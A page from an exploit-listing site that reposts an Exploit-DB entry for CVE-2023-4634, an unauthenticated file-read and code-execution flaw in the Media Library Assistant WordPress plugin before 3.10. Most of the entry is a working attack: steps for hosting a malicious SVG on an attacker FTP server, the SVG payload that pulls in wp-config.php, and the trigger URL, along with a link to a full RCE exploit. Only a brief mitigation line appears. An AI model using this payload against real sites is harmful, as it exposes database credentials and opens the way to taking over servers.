Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-import-export-lite domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the insert-headers-and-footers domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121
Media Library Assistant Wordpress Plugin - RCE and LFI - exploit.company
header-logo
Suggest Exploit
vendor:
Media Library Assistant WordPress Plugin
by:
Florent MONTEL
6.1
CVSS
HIGH
Remote Code Execution (RCE) and Local File Inclusion (LFI)
20
CWE
Product Name: Media Library Assistant WordPress Plugin
Affected Version From: Version < 3.10
Affected Version To: None
Patch Exists: YES
Related CWE: CVE-2023-4634
CPE: a:media_library_assistant_wordpress_plugin
Metasploit: https://www.rapid7.com/db/vulnerabilities/alma_linux-cve-2023-38497/
Other Scripts: https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/unix/local/opensmtpd_oob_read_lpe
Platforms Tested: WordPress
2023

Media Library Assistant WordPress Plugin – RCE and LFI

Media Library Assistant Wordpress Plugin in version < 3.10 is affected by an unauthenticated remote reference to Imagick() conversion which allows attacker to perform LFI and RCE depending on the Imagick configuration on the remote server. The affected page is: wp-content/plugins/media-library-assistant/includes/mla-stream-image.php

Mitigation:

Update to version 3.10 or higher. Disable external access to the Imagick() function if not required.
Source

Exploit-DB raw data:

# Exploit Title: Media Library Assistant Wordpress Plugin - RCE and LFI 
# Date: 2023/09/05
# CVE: CVE-2023-4634
# Exploit Author: Florent MONTEL / Patrowl.io / @Pepitoh / Twitter @Pepito_oh
# Exploitation path: https://patrowl.io/blog-wordpress-media-library-rce-cve-2023-4634/
# Exploit: https://github.com/Patrowl/CVE-2023-4634/
# Vendor Homepage: https://fr.wordpress.org/plugins/media-library-assistant/
# Software Link: https://fr.wordpress.org/plugins/media-library-assistant/
# Version: < 3.10
# Tested on: 3.09
# Description:
# Media Library Assistant Wordpress Plugin in version < 3.10 is affected by an unauthenticated remote reference to Imagick() conversion which allows attacker to perform LFI and RCE depending on the Imagick configuration on the remote server. The affected page is: wp-content/plugins/media-library-assistant/includes/mla-stream-image.php


#LFI

Steps to trigger conversion of a remote SVG

Create a remote FTP server at ftp://X.X.X.X:21 (http will not work, see references)

Host 2 files :
- malicious.svg
- malicious.svg[1]


Payload:
For LFI, getting wp-config.php:

Both malicious.svg and malicious.svg[1] on the remote FTP:

<svg width="500" height="500"
xmlns:xlink="http://www.w3.org/1999/xlink">
xmlns="http://www.w3.org/2000/svg">
<image xlink:href= "text:../../../../wp-config.php" width="500" height="500" />
</svg>

Then trigger conversion with:
http://127.0.0.1/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://X.X.X.X:21/malicious.svg&mla_debug=log&mla_stream_frame=1


# Directory listing or RCE:
To achieve Directory listing or even RCE, it is a little more complicated. 

Use exploit available here:
https://github.com/Patrowl/CVE-2023-4634/

# Note
Exploitation will depend on the policy.xml Imagick configuration file installed on the remote server. All exploitation paths and scripts have been performed with a default wordpress configuration and installation (Wordpress has high chance to have the default Imagick configuration).

Navigation

Suggest Exploit

Services By CQR

cqrsecured